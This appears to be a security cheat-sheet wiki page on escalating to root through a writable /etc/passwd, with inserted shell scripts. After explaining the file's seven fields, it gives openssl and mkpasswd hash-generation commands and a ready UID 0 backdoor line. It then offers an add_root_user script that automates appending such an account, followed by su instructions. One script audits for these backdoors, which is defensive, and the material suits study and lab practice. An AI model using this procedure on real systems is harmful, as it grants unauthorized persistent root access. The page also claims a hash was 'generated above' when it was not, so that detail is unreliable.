exploiting writeable etc passwd - dvanmosselbeen/security-cheat-sheet GitHub Wiki

Exploiting writeable /etc/passwd

Introduction

Sometimes, depending on the context and the vulnerability we discover, we end up with write access to the /etc/passwd file. By default /etc/passwd is not writeable by normal users; only root can modify it. However, a misconfiguration, or another vulnerability that lets us write files as root, can give us the opportunity to write to /etc/passwd, and that alone is enough to take over the host.

Understanding /etc/passwd

The /etc/passwd file stores the essential account information that is required during login. It is a plain text file containing a list of the system's accounts and, for each account, information such as the user ID, group ID, home directory and login shell.

The /etc/passwd file must be world-readable, since many utilities use it to map user IDs to user names, but write access must be limited to the superuser (root). When it is not, for example because the file mode is wrong or a user has erroneously been added to a group that may write to it, we have a vulnerability that allows the creation of a root-equivalent user that we control.

Understanding /etc/passwd format

The /etc/passwd file contains one line per user account. Each line has seven fields separated by colons (:). A typical entry looks as follows:

root:x:0:0:root:/root:/bin/bash

The fields, from left to right:

  1. Username: The name used when the user logs in. It should be between 1 and 32 characters in length.
  2. Password: An x indicates that the password hash is stored in /etc/shadow (readable only by root); the passwd command manages that hash and leaves the x here. If this field instead contains a crypt(3)-style hash, login is checked against that hash directly. An empty field means no password at all, which PAM may or may not accept depending on its nullok setting.
  3. User ID (UID): Each user is assigned a numeric user ID. UID 0 is root, and any account with UID 0 has root privileges regardless of its name. On most distributions UIDs 1-99 are reserved for predefined accounts and UIDs 100-999 for system and administrative accounts.
  4. Group ID (GID): The primary group ID (defined in /etc/group). GID 0 is the root group.
  5. User ID Info (GECOS): A comment field for extra information about the user, such as full name or phone number. It is displayed by the finger command.
  6. Home directory: The absolute path to the directory the user is placed in at login. If the directory does not exist, login typically falls back to / (usually with a warning).
  7. Command/shell: The absolute path of the program started at login, typically a shell such as /bin/bash. It does not have to be a shell; /usr/sbin/nologin or /bin/false is used to block interactive login.
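The format above is easy to parse with awk, and the same parse doubles as a check for the conditions this page describes: a writable file, a second UID 0 account, an inline hash in field 2, or a malformed line. The following script is an added example, not part of the wiki page; the sample entries at the bottom are constructed for the demonstration, and the backdoor line reuses the hash shown later on this page.

```shell
#!/bin/sh
# Added example (not from the wiki page): parse a passwd-format file field by
# field and flag the conditions the sections above describe. The sample
# entries at the bottom are constructed for the demonstration.

# audit_passwd FILE
# Prints one finding per line and returns 0 only when nothing was flagged.
audit_passwd() {
    file="$1"
    count=0

    # Write access is what turns the format into a privilege escalation:
    # flag the file if it is group- or world-writable (mode bits 020 / 002).
    if [ -n "$(find "$file" -perm -020 -o -perm -002 2>/dev/null)" ]; then
        echo "WRITABLE: $file is group- or world-writable"
        count=$((count + 1))
    fi

    # Field-level checks in one awk pass. Field numbering follows the list above:
    # $1 name, $2 password, $3 uid, $4 gid, $5 comment, $6 home, $7 shell.
    findings=$(awk -F: '
        NF != 7 { print "MALFORMED: line " NR " has " NF " fields, expected 7: " $0; next }
        $3 == 0 && $1 != "root" { print "UID0: " $1 " has uid 0 (a second root account)" }
        $2 == ""                { print "NOPASS: " $1 " has an empty password field" }
        $2 != "x" && $2 != "" && $2 !~ /^[!*]/ {
            print "INLINE_HASH: " $1 " carries a password hash inside this file: " $2
        }
    ' "$file")

    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        count=$((count + $(printf '%s\n' "$findings" | wc -l)))
    fi

    echo "$count finding(s) in $file"
    [ "$count" -eq 0 ]
}

# Demonstration on a constructed file: root (normal), a system account,
# a backdoor with uid 0 and an inline hash, and a truncated line.
sample=$(mktemp)
printf '%s\n' \
    'root:x:0:0:root:/root:/bin/bash' \
    'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' \
    'backdoor:$1$mysalt$hREc3A9Q3vWq/TYxhRgW80:0:0:root:/root:/bin/bash' \
    'broken:x:1000:1000:/home/broken' > "$sample"
chmod 600 "$sample"
audit_passwd "$sample" || echo "(findings above are expected for the sample)"
rm -f "$sample"
```

Run it against the real file with `audit_passwd /etc/passwd`; a clean system reports 0 findings. Lock markers such as `*` and `!` in field 2 are deliberately not flagged, since they disable password login rather than enable it.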

How to exploit a writable /etc/passwd

It's simple really: if /etc/passwd is writable, we append a new line in the format above to create a new user. We put a password hash of our choice in the password field (not an x, which would send the login to /etc/shadow, where no entry exists for our user), set the UID and GID to 0 (root) and give the account a shell. That lets us log in, or su, as our own root user.

Generate a Linux password hash

openssl can produce a crypt(3)-style hash; the -1 option selects the MD5-based format ($1$). Syntax:

$ openssl passwd -1 -salt <SALTNAME> <PASSWORD>

For example:

$ openssl passwd -1 -salt mysalt password123
$1$mysalt$hREc3A9Q3vWq/TYxhRgW80

Or, without an algorithm option, which yields a traditional DES crypt hash (hence the warning that the password is truncated to 8 characters):

$ openssl passwd newpasswordhere
Warning: truncating password to 8 characters
xCGsLUSejS.No

Or with mkpasswd (from the whois package on Debian-based systems), which produces a SHA-512 ($6$) hash:

$ mkpasswd -m sha-512 newpasswordhere

Modifying /etc/passwd

Given write access to /etc/passwd, append the following line to create a new user named mynewuser with UID 0, GID 0 and a root shell (the password field holds the hash generated above, not an x):

mynewuser:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash

Historically, /etc/passwd held the password hashes directly; shadow passwords moved them into /etc/shadow, but Linux logins (pam_unix and the classic login) generally still accept a hash placed in the password field of /etc/passwd. That backward compatibility is what this technique relies on, which is also why the x must be replaced with a real hash rather than kept.
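The procedure above (generate a hash, build the seven-field line, append it) as a script is shown below. This is an added example, not code from the wiki page. It assumes openssl(1) is installed; gen_hash tries the SHA-512 format (-6, available in OpenSSL 1.1.1 and later) and falls back to the MD5 format (-1) used on this page. The target file defaults to /etc/passwd but can be pointed at any writable copy, which is how the demonstration at the bottom runs without root; the user name mynewuser and the hash are the page's own illustrative values.

```shell
#!/bin/sh
# Added example (not from the wiki page): the exploit procedure as a script.
# Assumptions: openssl(1) is present; TARGET defaults to /etc/passwd but may be
# any writable copy. User name and hash below are the page's illustrative values.

# gen_hash PASSWORD SALT -> crypt(3)-style hash. SHA-512 ($6$) when this OpenSSL
# supports -6 (1.1.1+), otherwise the MD5 ($1$) format used on the page.
gen_hash() {
    openssl passwd -6 -salt "$2" "$1" 2>/dev/null || openssl passwd -1 -salt "$2" "$1"
}

# make_entry USER HASH -> passwd line giving USER uid 0 / gid 0 and a root shell
make_entry() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$2"
}

# check_entry LINE -> 0 if LINE is a well-formed 7-field root entry whose
# password field is a hash (an "x" would send login to /etc/shadow, where no
# entry exists for our user, so login would fail)
check_entry() {
    printf '%s\n' "$1" | awk -F: '
        NF == 7 && $2 != "x" && $2 != "" && $3 == 0 && $4 == 0 &&
        $1 ~ /^[a-z_][a-z0-9_-]*$/ { ok = 1 }
        END { exit !ok }'
}

# add_root_user USER HASH [TARGET] -> appends the entry; refuses if TARGET is
# not writable by the current user or USER already exists there
add_root_user() {
    user="$1"; hash="$2"; target="${3:-/etc/passwd}"
    [ -w "$target" ] || { echo "$target is not writable by uid $(id -u)" >&2; return 2; }
    if awk -F: -v u="$user" '$1 == u { found = 1 } END { exit !found }' "$target"; then
        echo "user $user already exists in $target" >&2; return 3
    fi
    entry=$(make_entry "$user" "$hash")
    check_entry "$entry" || { echo "refusing to write a malformed entry" >&2; return 4; }
    printf '%s\n' "$entry" >> "$target"
    echo "appended: $entry"
}

# Demonstration against a temporary copy, so this runs without root.
copy=$(mktemp)
printf 'root:x:0:0:root:/root:/bin/bash\n' > "$copy"   # constructed minimal passwd
hash='$1$mysalt$hREc3A9Q3vWq/TYxhRgW80'               # the page's hash for password123
add_root_user mynewuser "$hash" "$copy"
# On a host where /etc/passwd really is writable:
#   add_root_user mynewuser "$(gen_hash password123 mysalt)"   then   su mynewuser
rm -f "$copy"
```

After the append, `su mynewuser` with the chosen password gives a uid 0 shell; `id` should report uid=0(root). check_entry is the step worth keeping: a mangled line (wrong field count, or an x where the hash belongs) silently fails to log in and leaves an obvious artefact for defenders.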
